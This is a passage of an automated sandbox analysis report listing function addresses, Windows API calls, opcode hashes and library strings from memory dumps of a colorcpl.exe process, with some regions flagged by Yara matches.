                                                                                                    • Instruction Fuzzy Hash: 7C90022160150502D10175595444A1A410B47D0741FD9C122A1024519FCA258A92A131
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 3ceb909ceb2ca730a1a748d57554ee082cfd72588ecc1f419b4d6ed40d07b195
                                                                                                    • Instruction ID: 5c1b6b1b5e38fd049c4fbdeec13bd5203dda8e0bcdce52343499bd82b618613d
                                                                                                    • Opcode Fuzzy Hash: 3ceb909ceb2ca730a1a748d57554ee082cfd72588ecc1f419b4d6ed40d07b195
                                                                                                    • Instruction Fuzzy Hash: FC90026134150442D10075595454F0A410687E1701FD9C115E1064518E8619CD526126
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 854c6e721b74415159bae7b04f9da712e27db917ec68e97370876000a6ef9306
                                                                                                    • Instruction ID: dfa2dd36ac6ba3ceef71a8150ce7e8c7d006fad16fa1bb7b9abbf9dc1dbaa0f4
                                                                                                    • Opcode Fuzzy Hash: 854c6e721b74415159bae7b04f9da712e27db917ec68e97370876000a6ef9306
                                                                                                    • Instruction Fuzzy Hash: F9900221211D0042D20079695C54F0B410647D0703FD9C215A0154518DC91589615521
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 9ad84a99bfae30b1e97e7a1361afce147b7bfd3a6dc2c68808c34ed208994156
                                                                                                    • Instruction ID: 583a1cb58de0dd9773372a45f7a5590da0f7a9d3f89cabac6dc97551e053dfd1
                                                                                                    • Opcode Fuzzy Hash: 9ad84a99bfae30b1e97e7a1361afce147b7bfd3a6dc2c68808c34ed208994156
                                                                                                    • Instruction Fuzzy Hash: 5490022160150042414075699884D0A81066BE17117D9C221A0998514E855989655665
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4682ca865625ed9c7fbf01a104295cd7b8b81bcbe127fee51cf9c10c32332316
                                                                                                    • Instruction ID: 64bf0ec499710ea7db108468f7d2908089d173e95623a1bc2433a4e5778f80a4
                                                                                                    • Opcode Fuzzy Hash: 4682ca865625ed9c7fbf01a104295cd7b8b81bcbe127fee51cf9c10c32332316
                                                                                                    • Instruction Fuzzy Hash: 2C90023120190402D10075595854B0F410647D0702FD9C111A1164519E862589516571
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: fdf7bb576d04faab6fd9d053ce132f016a7ad87a579ddee71186f018ddfb5cb1
                                                                                                    • Instruction ID: 648bd8a6143cb404bd1a1c333238729a5e2af75eefcd38c9da45665eca1931b9
                                                                                                    • Opcode Fuzzy Hash: fdf7bb576d04faab6fd9d053ce132f016a7ad87a579ddee71186f018ddfb5cb1
                                                                                                    • Instruction Fuzzy Hash: CA90023120158802D11075599444B4E410647D0701FDDC511A442461CE869589917121
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4bca0d0a35441fc9e6eea9535c764ee8f82209b7a518ea1804d142702b7453c6
                                                                                                    • Instruction ID: 3fd66909fbe8232652d13eb6555c10944c310d468aed51e4f209096a650ac53a
                                                                                                    • Opcode Fuzzy Hash: 4bca0d0a35441fc9e6eea9535c764ee8f82209b7a518ea1804d142702b7453c6
                                                                                                    • Instruction Fuzzy Hash: DD90023120150402D10079996448A4A410647E0701FD9D111A5024519FC66589916131
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 2363d21f9ee769a0bbac45cac7c3c3e6df5090589df608c256fb5d2127453109
                                                                                                    • Instruction ID: a02bc3a5828970b5b9fd4ef9b99b4df4b27c564101bca8431d06155905ba4c06
                                                                                                    • Opcode Fuzzy Hash: 2363d21f9ee769a0bbac45cac7c3c3e6df5090589df608c256fb5d2127453109
                                                                                                    • Instruction Fuzzy Hash: 1A90022130150003D14075596458A0A810697E1701FD9D111E0414518DD91589565222
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 12c6aedcb644f06c0ed527a800fb8b968948e77fb119c8474479e7cda7220bc3
                                                                                                    • Instruction ID: f621065b029b29e987fd89dd8459a1646d5a9fc2526f823c56de7113b0f7cc04
                                                                                                    • Opcode Fuzzy Hash: 12c6aedcb644f06c0ed527a800fb8b968948e77fb119c8474479e7cda7220bc3
                                                                                                    • Instruction Fuzzy Hash: 0890022921350002D18075596448A0E410647D1702FD9D515A001551CDC91589695321
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: a97af0093b119c5476044c6410aa1a09b7fa7c2c199281eba53c59597c801c47
                                                                                                    • Instruction ID: 26b9a3899a7ecfbb75adb7b07c3dfb6e92f65d46411330d78a40db0f9f78af96
                                                                                                    • Opcode Fuzzy Hash: a97af0093b119c5476044c6410aa1a09b7fa7c2c199281eba53c59597c801c47
                                                                                                    • Instruction Fuzzy Hash: AF90023120150413D11175595544B0B410A47D0741FD9C512A042451CE96568A52A121
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 74b7f10001f5272f3cd0af44b9757dbc64ac7f20f034259f49305663247d969d
                                                                                                    • Instruction ID: b8bcb91b51090ba4b65fe742a2ba50b7eb8ca2226d1c803c0de5e76063b79ec5
                                                                                                    • Opcode Fuzzy Hash: 74b7f10001f5272f3cd0af44b9757dbc64ac7f20f034259f49305663247d969d
                                                                                                    • Instruction Fuzzy Hash: 41900221242541525545B559544490B810757E07417D9C112A1414914D85269956D621
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: dce3e762726abb99499f533c1a0df16f6b1b62f69b271efdc5d6721fc7096a82
                                                                                                    • Instruction ID: b5b04a41627d9af262fae29781b810be1a0aac9c034c02bd4d3798c27e8789f2
                                                                                                    • Opcode Fuzzy Hash: dce3e762726abb99499f533c1a0df16f6b1b62f69b271efdc5d6721fc7096a82
                                                                                                    • Instruction Fuzzy Hash: E2900435311500030105FD5D1744D0F414747D57513DDC131F1015514DD731CD715131
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 23ee61d954f18104160b29db66822e6be250943bead5a58b939368796718dafe
                                                                                                    • Instruction ID: d57ffc8a3c2b8bcdc3f3e95a08f45c307b329028321ad91935a128ae74b840c0
                                                                                                    • Opcode Fuzzy Hash: 23ee61d954f18104160b29db66822e6be250943bead5a58b939368796718dafe
                                                                                                    • Instruction Fuzzy Hash: 5F90026120250003410575595454A1A810B47E0701BD9C121E1014554EC52589916125
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 158b29cd30467fc2b3696c8af15ddc23a9be40b87f5b567ac4bf7d1e51f04be3
                                                                                                    • Instruction ID: 2858eabc17f622829c43f1bdf8334eb0c7458b2437d3436063c46decaa2871cd
                                                                                                    • Opcode Fuzzy Hash: 158b29cd30467fc2b3696c8af15ddc23a9be40b87f5b567ac4bf7d1e51f04be3
                                                                                                    • Instruction Fuzzy Hash: 9090023120150802D18075595444A4E410647D1701FD9C115A0025618ECA158B5977A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068B9AA0 Relevance: .1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 86126272d51f96ab7da4d18d228e3ceab6bfdf91b0f697e6cad56a1ae4796482
                                                                                                    • Instruction ID: 9168b690133625cb102315c6add2417fcaa59956339b4297ac6fd8231b1759d2
                                                                                                    • Opcode Fuzzy Hash: 86126272d51f96ab7da4d18d228e3ceab6bfdf91b0f697e6cad56a1ae4796482
                                                                                                    • Instruction Fuzzy Hash: 862137B2C402185BCFA1D668AD52AFF73BCAB45214F04106DEA59D3240F634BA498BA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068B8310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 195 68b8310-68b835a call 68cbe20 call 68cc9c0 call 68bace0 call 68c4e40 204 68b838e-68b8392 195->204 205 68b835c-68b836e PostThreadMessageW 195->205 206 68b838d 205->206 207 68b8370-68b838a call 68ba470 205->207 206->204 207->206
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 068B836A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836367815-0
                                                                                                    • Opcode ID: d2c2f55616cc2e91339e74353f8e062c48f1561fafdf18b869e17d229d79b45f
                                                                                                    • Instruction ID: 22254a5bf15c63455c14260b7decf2d51da06135dca97efb6b38805a9795cb2c
                                                                                                    • Opcode Fuzzy Hash: d2c2f55616cc2e91339e74353f8e062c48f1561fafdf18b869e17d229d79b45f
                                                                                                    • Instruction Fuzzy Hash: 4701DB71A8022877E7A4A6989C02FFE776C9B40F50F050118FF04FA2C1E6A4790647F7
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 252 68ca630-68ca646 253 68ca64c-68ca661 RtlFreeHeap 252->253 254 68ca647 call 68caf20 252->254 254->253
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000060,068B9CE3,?,?,068B9CE3,00000060,00000000,00000000,?,?,068B9CE3,?,00000000), ref: 068CA65D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                    • Instruction ID: 75ec4853219053d72cad1e7d483d3836066820f99628920e81693547226516f5
                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                    • Instruction Fuzzy Hash: B2E01AB12102086BD718DF59DC44EA777ACAF88750F014558B91857241C630E9108AB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 255 68ca790-68ca7c4 call 68caf20 LookupPrivilegeValueW
                                                                                                    APIs
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,068BF1C2,068BF1C2,0000003C,00000000,?,068B9D55), ref: 068CA7C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3899507212-0
                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                    • Instruction ID: 388fb2e3538176031fc78c9aec77b28bca6289bb1a5907169925859016d80460
                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                    • Instruction Fuzzy Hash: F8E01AB12002086BDB14DF49DC84EEB37ADAF88650F018154BA0857241C930E8108BF5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 249 68ca5f0-68ca621 call 68caf20 RtlAllocateHeap
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(068C4526,?,068C4C9F,068C4C9F,?,068C4526,?,?,?,?,?,00000000,068B9CE3,?), ref: 068CA61D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                    • Instruction ID: 48d6efd0184dda5ba7aab95750da5c4c56ad6cf6a254d6a3d5c67e75e45c37b3
                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                    • Instruction Fuzzy Hash: B3E01AB1210208ABD714DF59DC40EA777ACAF88654F114558BA185B241C530F9108BB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA623 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 258 68ca623-68ca647 call 68caf20 260 68ca64c-68ca661 RtlFreeHeap 258->260
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000060,068B9CE3,?,?,068B9CE3,00000060,00000000,00000000,?,?,068B9CE3,?,00000000), ref: 068CA65D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: 7e8c20df18b2a0f0690c05218500ab998fe79e60dc3cb4faee0809998cf7464d
                                                                                                    • Instruction ID: e364f500d3ba0950423e08a6cb6f275f0d745fc23350a35792d28a89971d98d7
                                                                                                    • Opcode Fuzzy Hash: 7e8c20df18b2a0f0690c05218500ab998fe79e60dc3cb4faee0809998cf7464d
                                                                                                    • Instruction Fuzzy Hash: BAE0DFB90502854FDB14EF58E8C086B37D1AF803143219A0AE85CC3612C234D8598BB2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 068CA670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 068CA698
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 621844428-0
                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                    • Instruction ID: 0c5108b5104e4060dd1c60496f050fbba8456e533fbe53b338b3858f3f1edc6d
                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                    • Instruction Fuzzy Hash: 34D017726102187BD624EB98DC85FE777ACDF487A0F0181A9BA1CAB241C571FA008BE1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E672C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 7860334fd3151ffab5e302573d5e960947494071251611b16406c048e083fc4e
                                                                                                    • Instruction ID: d641d42040beb6ad680de26e01beece68beb700971bf1b4389a32a5817741585
                                                                                                    • Opcode Fuzzy Hash: 7860334fd3151ffab5e302573d5e960947494071251611b16406c048e083fc4e
                                                                                                    • Instruction Fuzzy Hash: 4DB09BB1D015C5C5D641E7605608B0B7B0567D1B01FD9C161E3030645F4738C1D1E175
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 1E6EFCAB Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                    • API String ID: 0-2897834094
                                                                                                    • Opcode ID: f227d808b27bdca2a9dae733562b780faa08d64ac3ccddb57ae3189d8862c746
                                                                                                    • Instruction ID: 924a3df53758d45a9ee92a725bc21100a689a86f27e9df1735fb1e08ab3ae6fd
                                                                                                    • Opcode Fuzzy Hash: f227d808b27bdca2a9dae733562b780faa08d64ac3ccddb57ae3189d8862c746
                                                                                                    • Instruction Fuzzy Hash: C161AEB69131D3EFD201DF55D984E5077F5EB0A720BCA47AAE8015FB92C634ACC09E45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D5910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1E6D5FE1
                                                                                                    • @, xrefs: 1E6D647A
                                                                                                    • Control Panel\Desktop, xrefs: 1E6D615E
                                                                                                    • LanguageConfigurationPending, xrefs: 1E6D6221
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1E6D635D
                                                                                                    • PreferredUILanguagesPending, xrefs: 1E6D61D2
                                                                                                    • LanguageConfiguration, xrefs: 1E6D6420
                                                                                                    • PreferredUILanguages, xrefs: 1E6D63D1
                                                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 1E6D5A84
                                                                                                    • @, xrefs: 1E6D61B0
                                                                                                    • @, xrefs: 1E6D6027
                                                                                                    • InstallLanguageFallback, xrefs: 1E6D6050
                                                                                                    • @, xrefs: 1E6D63A0
                                                                                                    • @, xrefs: 1E6D6277
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
